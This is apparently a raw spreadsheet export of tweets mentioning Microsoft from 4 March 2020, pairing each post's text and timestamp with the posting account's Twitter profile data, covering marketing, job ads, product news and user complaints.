    <t>{'id': 2661139074, 'id_str': '2661139074', 'name': 'Outreach', 'screen_name': 'outreach_io', 'location': 'Seattle, San Francisco', 'description': 'Outreach, the leading Sales Engagement Platform, accelerates revenue growth by optimizing every interaction throughout the customer lifecycle.', 'url': 'https://t.co/TfvYzlEXb9', 'entities': {'url': {'urls': [{'url': 'https://t.co/TfvYzlEXb9', 'expanded_url': 'http://outreach.io', 'display_url': 'outreach.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6764, 'friends_count': 4053, 'listed_count': 234, 'created_at': 'Sun Jul 20 01:01:52 +0000 2014', 'favourites_count': 3628, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5707,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'http://pbs.twimg.com/profile_images/1145800511938945025/a-qi8xBc_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1145800511938945025/a-qi8xBc_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2661139074/1559661337', 'profile_link_color': '5951FF',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</si>
  <si>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14:01:31 +0000 2020</t>
  </si>
  <si>
    <t>For #SMBs, moving to the #cloud is proven to help achieve greater profit margins and ROI. Check out this informative infographic to see why it's a game changer.      #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/UEKHjVuFTD</t>
  </si>
  <si>
    <t>{'id': 1069120807, 'id_str': '1069120807', 'name': 'Paradigm Technology Consulting', 'screen_name': 'Paradigm_Consul', 'location': 'Allentown, NJ', 'description': 'PTC is a seasoned team of business professionals that help clients gain valuable business insights from their financial and operations systems.', 'url': 'https://t.co/iDvq0Z4HYX', 'entities': {'url': {'urls': [{'url': 'https://t.co/iDvq0Z4HYX', 'expanded_url': 'http://www.PTCSolutions.com', 'display_url': 'PTCSolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 26, 'friends_count': 18, 'listed_count': 3, 'created_at': 'Mon Jan 07 20:05:45 +0000 2013', 'favourites_count': 5, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 144,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'http://pbs.twimg.com/profile_images/1220444097514803201/4XpHMi9K_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220444097514803201/4XpHMi9K_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1069120807/1515510252',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</si>
  <si>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14:01:30 +0000 2020</t>
  </si>
  <si>
    <t>Nervous to apply for a job like "VB Net" at Robert Half Technology? Apply even if you're not a 100% match. You might be underestimating your value. Click the link in our bio for more info. #Microsoft #Memphis, TN</t>
  </si>
  <si>
    <t>{'id': 24559037, 'id_str': '24559037', 'name': 'TMJ-MEM IT-.NET Jobs', 'screen_name': 'tmj_mem_itdnet', 'location': 'Memphis, TN', 'description': 'Follow this account for geo-targeted Software Dev.  - Microsoft Tools job tweets in Memphis, TN. Need help? Tweet us at @CareerArc!', 'url': 'https://t.co/Z6TeNFMRLm', 'entities': {'url': {'urls': [{'url': 'https://t.co/Z6TeNFMRLm', 'expanded_url': 'http://bit.ly/2FlJuXl', 'display_url': 'bit.ly/2FlJuXl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 178, 'friends_count': 166, 'listed_count': 0, 'created_at': 'Sun Mar 15 18:05:57 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1,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'http://pbs.twimg.com/profile_images/682149823475093504/K9tQr3SS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/682149823475093504/K9tQr3SS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24559037/1451472168',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</si>
  <si>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Mar 04 14:01:10 +0000 2020</t>
  </si>
  <si>
    <t>Attackers probing for vulnerable Microsoft Exchange Servers, is yours one of them? CVE-2020-0688
#exchangeserver #microsoftexchange #vulnerability #Security #CyberSecurity #CyberAttack #microsoft https://t.co/TMuWvspkR4</t>
  </si>
  <si>
    <t>{'id': 14723025, 'id_str': '14723025', 'name': 'swiderek', 'screen_name': 'swiderek', 'location': '', 'description': 'Cloud | Cyber Security | Innovation | Startup | Consulting | Expert | Problem Solver', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7444, 'friends_count': 3740, 'listed_count': 239, 'created_at': 'Sat May 10 08:56:19 +0000 2008', 'favourites_count': 589, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3520,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'http://pbs.twimg.com/profile_images/1896263728/d_swiderek_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1896263728/d_swiderek_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14723025/1398264547', 'profile_link_color': '058DF5',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'regular'}</t>
  </si>
  <si>
    <t>Wed Mar 04 14:00:16 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Removes Standalone Security Update Causing Issues on Some PCs
@smithrussell
https://t.co/Lc8UKRg1An</t>
  </si>
  <si>
    <t>{'id': 1052472740341538816, 'id_str': '1052472740341538816', 'name': 'Ann Nagornaya', 'screen_name': 'NagornayaAnita', 'location': 'USA', 'description': 'QA Engineer at @starwindsan. Interested in  #Virtualization #HyperV #VMware #Storage #Backup #Traveling', 'url': 'https://t.co/t5tzfurUNv', 'entities': {'url': {'urls': [{'url': 'https://t.co/t5tzfurUNv', 'expanded_url': 'http://starwind.com', 'display_url': 'starwind.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3801, 'friends_count': 3540, 'listed_count': 19, 'created_at': 'Wed Oct 17 08:13:50 +0000 2018', 'favourites_count': 828, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 989, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1052476997199429632/YkNZ87rG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1052476997199429632/YkNZ87rG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1052472740341538816/1539932404',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</si>
  <si>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14:00:11 +0000 2020</t>
  </si>
  <si>
    <t>Do you feel that you are providing a boring customer experience?
Microsoft Dynamics 365 - Customer Engagement provides great customer experience which in turn build a long term customer collaboration.
#dynamics365 #microsoft #dynamics365 #customer #engagement #sales https://t.co/EkfbFKYPpQ</t>
  </si>
  <si>
    <t>{'id': 831128676343361536, 'id_str': '831128676343361536', 'name': 'IAX SERVICES- UAE', 'screen_name': 'iaxSERVICES', 'location': 'Dubai, United Arab Emirates', 'description': 'is one of the UAEâ€™s emerging Solution Provider with local presence in eight countries UAE, KSA, Jordan, Kuwait, Lebanon, Qatar, Pakistan and India', 'url': 'https://t.co/7sVcGhwmQE', 'entities': {'url': {'urls': [{'url': 'https://t.co/7sVcGhwmQE', 'expanded_url': 'http://www.iaxservices.ae', 'display_url': 'iaxservices.ae', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 16, 'friends_count': 235, 'listed_count': 0, 'created_at': 'Mon Feb 13 13:11:32 +0000 2017', 'favourites_count': 5, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 236, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1156589657825665026/gZtwOHq4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1156589657825665026/gZtwOHq4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/831128676343361536/1513577310',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</si>
  <si>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14:00:07 +0000 2020</t>
  </si>
  <si>
    <t>Check out all the newly released/announced features for SharePoint from February. #Microsoft #technology #sharepoint https://t.co/vyNUpOSfz9 #MSFTAdvocate</t>
  </si>
  <si>
    <t>Wed Mar 04 14:00:06 +0000 2020</t>
  </si>
  <si>
    <t>#SharePoint wasn't always called SharePoint. Do you know what the original name was? Reply to this Tweet with the answer! #Microsoft #Dock365 https://t.co/FMknbDTZZD</t>
  </si>
  <si>
    <t>{'id': 4198283360, 'id_str': '4198283360', 'name': 'Dock 365 Inc.', 'screen_name': 'mydock365', 'location': 'Jacksonville, FL, US, 32256', 'description': 'Dock w/ SharePoint &amp; Office 365 brings together productivity &amp; organizational features creating an intranet platform, exclusively for your enterprise business.', 'url': 'https://t.co/y2ykBl7cgZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/y2ykBl7cgZ', 'expanded_url': 'http://www.mydock365.com/', 'display_url': 'mydock365.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 648, 'friends_count': 1317, 'listed_count': 156, 'created_at': 'Wed Nov 11 05:58:55 +0000 2015', 'favourites_count': 1073, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4859,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'http://pbs.twimg.com/profile_images/1234475279436984321/tmivHjyd_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234475279436984321/tmivHjyd_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4198283360/1582293714',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</si>
  <si>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14:00:04 +0000 2020</t>
  </si>
  <si>
    <t>U.S. Air Force and #Microsoft partner to empower #airmen with modern #IT. #USAF #Cloud https://t.co/U7sU9kX4qs</t>
  </si>
  <si>
    <t>If you are going to keep using #Windows7 in 2020 you will not receive any official #updates or #BugFixes from #Microsoft...https://t.co/cnX3xd6D6s 
If you want to know more about the upgrade process, after Windows 7 end of of life, head to our website... https://t.co/NRIqIp9FKW https://t.co/RgQdVKISF8</t>
  </si>
  <si>
    <t>{'id': 828722252, 'id_str': '828722252', 'name': 'IT-Works ðŸ–¥ï¸', 'screen_name': 'IT_Works2012', 'location': 'Kidderminster, England', 'description': 'Flexible IT Support for SMEs &amp; businesses of all sizes. Optimised IT systems can maximise your potential. 0121 2700808 / enquiries@it-works.co.uk ðŸ’»ðŸ–¨ðŸ–±', 'url': 'https://t.co/3ImY34XoB1', 'entities': {'url': {'urls': [{'url': 'https://t.co/3ImY34XoB1', 'expanded_url': 'http://www.it-works.co.uk', 'display_url': 'it-works.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1166, 'friends_count': 2521, 'listed_count': 7, 'created_at': 'Mon Sep 17 09:35:16 +0000 2012', 'favourites_count': 14018, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2386,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'http://pbs.twimg.com/profile_images/1212663474540728321/yWqk0z22_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212663474540728321/yWqk0z22_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/828722252/1529337698',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</si>
  <si>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14:00:03 +0000 2020</t>
  </si>
  <si>
    <t>We all deserve the cleanest air possible. Read how #AI could help plan the healthiest route through your city. #Microsoft #smartcity #Microsoft #AIforEarth https://t.co/O6a4OCG52b</t>
  </si>
  <si>
    <t>The #Microsoft #Cybersecurity Reference Architecture describes Microsofts cybersecurity capabilities and how they integrate with existing #security architectures and capabilities. https://t.co/sHuJEtgkn4</t>
  </si>
  <si>
    <t>{'id': 34923688, 'id_str': '34923688', 'name': 'Ansley', 'screen_name': 'falloutx', 'location': 'Singapore', 'description': 'IoT Specialist, Open source data, CosmosDB  @ Microsoft', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 377, 'friends_count': 607, 'listed_count': 18, 'created_at': 'Fri Apr 24 13:27:05 +0000 2009', 'favourites_count': 2927, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7229,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'http://pbs.twimg.com/profile_images/1151549661598982145/ufGeTlHI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1151549661598982145/ufGeTlHI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/34923688/1563386148',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</si>
  <si>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14:00:01 +0000 2020</t>
  </si>
  <si>
    <t>EPFR  mentioned in Quartz article: 'Microsoft stock is the biggest winner from environmental and socially responsible investing'. Read the full article at: https://t.co/pH67dcwNaT #ESG #EPFR #Microsoft</t>
  </si>
  <si>
    <t>{'id': 36398495, 'id_str': '36398495', 'name': 'EPFR', 'screen_name': 'EPFR', 'location': '', 'description': 'Part of @IFI_Financial, Tracking fund flows &amp; fund allocations data, mapping trends globally utilizing intra-day, daily, weekly, &amp; monthly proprietary sources.', 'url': 'https://t.co/h4D1C19h95', 'entities': {'url': {'urls': [{'url': 'https://t.co/h4D1C19h95', 'expanded_url': 'https://financialintelligence.informa.com/products-and-services/data-analysis-and-tools/epfr', 'display_url': 'financialintelligence.informa.com/products-and-sâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1538, 'friends_count': 65, 'listed_count': 49, 'created_at': 'Wed Apr 29 16:23:55 +0000 2009', 'favourites_count': 39, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 624,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'http://pbs.twimg.com/profile_images/1116741872490168320/hQyU3f0p_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1116741872490168320/hQyU3f0p_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/36398495/1555086872', 'profile_link_color': '000000', 'profile_sidebar_border_color': '444A55', 'profile_sidebar_fill_color': '000000', 'profile_text_color': '736868', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 14:00:00 +0000 2020</t>
  </si>
  <si>
    <t>We're rearchitecting everything at Microsoft now that we're fully in the #cloud.  #transformation #Azure #Microsoft https://t.co/iET39KbDj8</t>
  </si>
  <si>
    <t>Wed Mar 04 13:59:32 +0000 2020</t>
  </si>
  <si>
    <t>#Surface Neo: Everything you need to know about #Microsofts first dual-screen PC https://t.co/lFGB5vvHyl https://t.co/Nqgac0H8AZ</t>
  </si>
  <si>
    <t>Wed Mar 04 13:58:01 +0000 2020</t>
  </si>
  <si>
    <t>Qatar moves into premier league of connected economies https://t.co/ltEfNs2VUV #Qatar #digital #MENA #broadband #mobile #FTTP #IoT #MobileApp #telecom #mobile #5G #Huawei #Microsoft #cloud #Ooredoo #vodafoneqatar #networks #VMware #omnisperience</t>
  </si>
  <si>
    <t>{'id': 20053817, 'id_str': '20053817', 'name': 'Teresa Cottam', 'screen_name': 'Teresacottam', 'location': 'UK', 'description': 'Chief Analyst at Omnisperience. Expert in the experience economy and B2B telecoms. #GloMoAwards judge. From the Shire - Nottinghamshire', 'url': 'https://t.co/DkGQFEd3im', 'entities': {'url': {'urls': [{'url': 'https://t.co/DkGQFEd3im', 'expanded_url': 'http://www.omnisperience.com', 'display_url': 'omnisperience.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3253, 'friends_count': 2474, 'listed_count': 158, 'created_at': 'Wed Feb 04 13:48:34 +0000 2009', 'favourites_count': 257, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7434, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '091304', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1095339912537157632/5qVBkZ5b_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1095339912537157632/5qVBkZ5b_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20053817/1502691549', 'profile_link_color': 'ABB8C2', 'profile_sidebar_border_color': '4D4A33', 'profile_sidebar_fill_color': '262626', 'profile_text_color': '696545', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 13:55:11 +0000 2020</t>
  </si>
  <si>
    <t>#Omuni presents the 3rd Edition Future of Retail Summit &amp;amp; Awards 2020, on 6th March, at the Holiday Inn, Delhi. Come and be a part of this grand event here: https://t.co/6hRUETF9vK
#RethinkRetail #PoweredByArvindInternet #Omnichannel #Adobe #Microsoft #EasyRewardz #UBSForums https://t.co/uZ6daFjMGv</t>
  </si>
  <si>
    <t>{'id': 950270210568671232, 'id_str': '950270210568671232', 'name': 'Omuni', 'screen_name': 'ArvindInternet', 'location': 'Bengaluru, India', 'description': 'Omuni: Indiaâ€™s leading omnichannel retail enablement platform built by retail practitioners. Need a product demo? Visit https://t.co/la7z1vDss9 today!', 'url': 'https://t.co/ABN06B8SA2', 'entities': {'url': {'urls': [{'url': 'https://t.co/ABN06B8SA2', 'expanded_url': 'http://omuni.com', 'display_url': 'omuni.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/la7z1vDss9', 'expanded_url': 'http://Omuni.com', 'display_url': 'Omuni.com', 'indices': [120, 143]}]}}, 'protected': False, 'followers_count': 40, 'friends_count': 24, 'listed_count': 1, 'created_at': 'Mon Jan 08 07:37:28 +0000 2018', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1213062130879979520/jsJnwLoZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1213062130879979520/jsJnwLoZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/950270210568671232/1580465967', 'profile_link_color': '702283',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</si>
  <si>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13:55:05 +0000 2020</t>
  </si>
  <si>
    <t>Its going to be the best day of our lives $Link #Chainlink #Microsoft #Amazon #mixicles #Oracle https://t.co/OAylvjrj8C</t>
  </si>
  <si>
    <t>{'id': 1133127997794455553, 'id_str': '1133127997794455553', 'name': 'â¬¡ Wittelsbacher â¬¡', 'screen_name': 'W1ttelsbacher', 'location': 'London', 'description': 'Support $Link, Blockchain, Independence, Peace, HK, Palestine, Iran, Catalunya, Chile, #Bitcoin', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 166, 'friends_count': 821, 'listed_count': 0, 'created_at': 'Mon May 27 21:49:01 +0000 2019', 'favourites_count': 3419, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 456, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1222425431057498113/dsY8-Wfg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222425431057498113/dsY8-Wfg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1133127997794455553/1563948814',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</si>
  <si>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13:51:49 +0000 2020</t>
  </si>
  <si>
    <t>@Wunderlist Im so sad you are dying, @MicrosoftToDo is a horrible alternative and is not a LIST app, I dont want to amalgamate my whole life for #Microsoft, I have ADHD and rely on this app to get through the day, so far @AnyListApp is my best choice. #anxiety #ADHD #ADD</t>
  </si>
  <si>
    <t>{'id': 1094342807261798401, 'id_str': '1094342807261798401', 'name': 'Lele â´°âµŽâ´°âµ', 'screen_name': 'PrincessoftheP7', 'location': 'Scotland was ðŸ‡¨ðŸ‡¦', 'description': 'ðŸŒ² â“‹ Planet Loving &amp; Overcoming #cptsd #anxiety #depression #adhd #AbuseSurvivor âµ£ â¤ï¸#ClimateJustice #IndigenousRights #LandBack Animals = ðŸ¥° current moodðŸ¦‡', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 56, 'friends_count': 318, 'listed_count': 0, 'created_at': 'Sat Feb 09 21:10:31 +0000 2019', 'favourites_count': 1059, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 214, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1229717411873595393/8G9lXV73_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229717411873595393/8G9lXV73_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1094342807261798401/1581453917',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</si>
  <si>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13:50:30 +0000 2020</t>
  </si>
  <si>
    <t>Compugen is pleased to announce that we are the first MAR ( Microsoft Authorized Reseller ) to become a carbon neutral company.
If you would like to help make your customers business carbon neutral email us at info@green4good.ca to learn how.
#Microsoft #Compugen #carbonneutral</t>
  </si>
  <si>
    <t>{'id': 1230128117064359938, 'id_str': '1230128117064359938', 'name': 'Dave_Compugen', 'screen_name': 'DCompugen', 'location': 'Montreal', 'description': 'Iâ€™m a seasoned Strategic Account Manager, and relationship builder, mentor and trainer with a heavy IT background, including Cyber-Security as a hobby.', 'url': 'https://t.co/FxAcyvamCd', 'entities': {'url': {'urls': [{'url': 'https://t.co/FxAcyvamCd', 'expanded_url': 'http://www.compugen.com', 'display_url': 'compugen.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 10, 'friends_count': 64, 'listed_count': 0, 'created_at': 'Wed Feb 19 13:53:00 +0000 2020', 'favourites_count': 14, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1230128665649909765/WtDgPYBS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230128665649909765/WtDgPYBS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1230128117064359938/1582120805',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</si>
  <si>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13:49:28 +0000 2020</t>
  </si>
  <si>
    <t>Expand your #customer base by offering #Hosted #Microsoft #WorkFolders File Syncing and Collaboration solution via #MachPanel.
https://t.co/8Z1RlkudXO</t>
  </si>
  <si>
    <t>{'id': 21483911, 'id_str': '21483911', 'name': 'MachSol', 'screen_name': 'MachSol', 'location': '21520 Yorba Linda, CA, USA', 'description': 'Multi-cloud Operations Management and Orchestration Solution for Managed Service Providers and Enterprise.', 'url': 'https://t.co/7DgahY6A04', 'entities': {'url': {'urls': [{'url': 'https://t.co/7DgahY6A04', 'expanded_url': 'http://www.machsol.com', 'display_url': 'machsol.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 52, 'friends_count': 63, 'listed_count': 2, 'created_at': 'Sat Feb 21 13:30:30 +0000 2009', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 89,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'http://pbs.twimg.com/profile_images/1063139335279730690/ZtvB9VY8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1063139335279730690/ZtvB9VY8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/21483911/1532605554', 'profile_link_color': 'DB332E',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</si>
  <si>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Wed Mar 04 13:48:21 +0000 2020</t>
  </si>
  <si>
    <t>Google and #Microsoft are giving away enterprise conferencing tools https://t.co/Ju8eCurUrN</t>
  </si>
  <si>
    <t>Wed Mar 04 13:47:50 +0000 2020</t>
  </si>
  <si>
    <t>Having partnered with #microsoft and #cisco for many years I welcome the close collaboration @vikasbutaney covers in his blog.  Handling data in the #edge before moving it to the #cloud should speed #digitaltransfomation, keeping d...https://t.co/G4Tc3C8g6x https://t.co/fybLs6sm50</t>
  </si>
  <si>
    <t>{'id': 3028289572, 'id_str': '3028289572', 'name': 'Steve HOPE', 'screen_name': 'SteveHopePro', 'location': 'Paris', 'description': 'Tech leadership and vision in #IoT #presales #salesengineering #solutionengineering #designthinking #CustomerDevelopment #DigitalTransformation #lorawan', 'url': 'https://t.co/GiNY1l1GDG', 'entities': {'url': {'urls': [{'url': 'https://t.co/GiNY1l1GDG', 'expanded_url': 'http://www.biot-global.com', 'display_url': 'biot-global.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 169, 'friends_count': 60, 'listed_count': 10, 'created_at': 'Tue Feb 10 15:02:38 +0000 2015', 'favourites_count': 22, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 330,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'http://pbs.twimg.com/profile_images/565245458000248832/l20yGvxY_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/565245458000248832/l20yGvxY_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3028289572/1489051814',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</si>
  <si>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13:47:22 +0000 2020</t>
  </si>
  <si>
    <t>Be the first to know all the news for the next generation of console! 
Come in store today and Register Your Interest to receive all the information direct to your email!
#Sony
#playstation5 
#Microsoft
#XboxSeriesX https://t.co/rTALQB18hJ</t>
  </si>
  <si>
    <t>{'id': 582857892, 'id_str': '582857892', 'name': 'GAME Chelmsford', 'screen_name': 'GAMEChelmsford', 'location': 'chelmsford', 'description': 'The latest news and information on games, and events happening in Chelmsford GAME!', 'url': 'http://t.co/yo8VnD1CMP', 'entities': {'url': {'urls': [{'url': 'http://t.co/yo8VnD1CMP', 'expanded_url': 'http://www.game.co.uk', 'display_url': 'game.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1627, 'friends_count': 661, 'listed_count': 45, 'created_at': 'Thu May 17 13:29:31 +0000 2012', 'favourites_count': 1735, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11380,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'http://pbs.twimg.com/profile_images/1158774615734411265/CC4ymBzU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1158774615734411265/CC4ymBzU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/582857892/1545992421', 'profile_link_color': 'E81C4F',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</si>
  <si>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13:47:12 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Mood just relax   
 #arsenal #microsoft https://t.co/pNnp2vZoXf</t>
  </si>
  <si>
    <t>{'id': 1234910388132700160, 'id_str': '1234910388132700160', 'name': 'Erika Langley', 'screen_name': 'sungcaripni', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 39, 'listed_count': 0, 'created_at': 'Tue Mar 03 18:36:01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'http://pbs.twimg.com/profile_images/1234911081887404032/-szDNavX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234911081887404032/-szDNavX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234910388132700160/1583260873',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</si>
  <si>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13:46:06 +0000 2020</t>
  </si>
  <si>
    <t>Discover how you can transform customer service with Microsoft Teams in our blog post: Find out more today: https://t.co/YCzngYZJ9l
#MicrosoftTeams #Teams #Microsoft #Office365 #CustomerService</t>
  </si>
  <si>
    <t>Hey @Outlook how about today you try and work on your #spam filters? Its early and Ive already received 19 spam emails. Your email is jacked! #Microsoft #email #junkmail</t>
  </si>
  <si>
    <t>{'id': 25763825, 'id_str': '25763825', 'name': 'BTru2URSelvz', 'screen_name': 'BTru2URSelvz', 'location': '', 'description': 'It doesnâ€™t matter who you are, your job in life, or how much money you have or donâ€™t. Right is right. Every person matters! All lives matter!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 34, 'friends_count': 75, 'listed_count': 0, 'created_at': 'Sun Mar 22 01:59:35 +0000 2009', 'favourites_count': 4729, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3038,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'http://pbs.twimg.com/profile_images/1223432630110228485/81QPvtfn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223432630110228485/81QPvtfn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/25763825/1576725645',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</si>
  <si>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13:43:51 +0000 2020</t>
  </si>
  <si>
    <t>@Oracle is upping its game in the race against #Microsoft and #Amazon for #cloud computing market share. @Reuters #cdwsocial https://t.co/cisMnT3uEu</t>
  </si>
  <si>
    <t>{'id': 1218551258178560001, 'id_str': '1218551258178560001', 'name': 'Andrew Pike', 'screen_name': 'AndrewPikeCDW', 'location': 'Toronto, Ontario', 'description': 'come here for CDW content', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 3, 'listed_count': 0, 'created_at': 'Sat Jan 18 15:10:43 +0000 2020', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 35,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</si>
  <si>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Mar 04 13:41:32 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft strikes a new deal with #NFL to have all 32 teams use Microsoft #Teams #MSFT      https://t.co/NZl9SizHjD</t>
  </si>
  <si>
